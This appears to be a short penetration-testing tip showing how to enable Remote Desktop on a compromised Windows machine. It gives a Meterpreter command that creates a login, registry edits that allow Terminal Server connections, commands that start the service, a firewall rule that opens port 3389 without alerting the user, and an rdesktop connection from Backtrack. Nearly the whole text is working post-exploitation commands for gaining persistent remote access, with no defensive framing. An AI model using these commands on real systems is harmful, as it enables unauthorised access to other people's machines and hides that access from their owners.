Enable RDP with Metasploit

meterpreter>run getgui -u username -p password

1. Enable RDP with Telnet or CMD

2. Telnet [or] Command Prompt –> with administrative rights

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

1. This step have not finished yet….we need to start the Terminal Service, because terminal servicewas disabled by default

sc config TermService start= auto

that command will make terminal service will start every time the computer started.

1. Now we need to start the terminal service for use right now, because the command on step 4 only to make terminalservice started every computer started and does not start the service.

net start Termservice

1. Okay everything already done, and we’ve almost done. The next step we need to open port that will be used by remote desktop on firewall, so the alert will not popping up while someone connect to remote desktop server.

1.   netsh.exe

2.   firewall

3.   add portopening TCP 3389 "Remote Desktop"

The command above will make firewall accepted every packet that came to port 3389 that used for Remote Desktopwithout alert.

1. Open a new terminal (Backtrack 5) or you can use Remote Desktop Client in Windows(Start –> All Programs –> Accessories –>Remote DesktopConnection). In thistips and trickI will use RDesktop in Backtrack 5 R2.

rdesktop 192.168.8.92

1. A GUI (Graphical User Interface) will pop out ask for user name and password.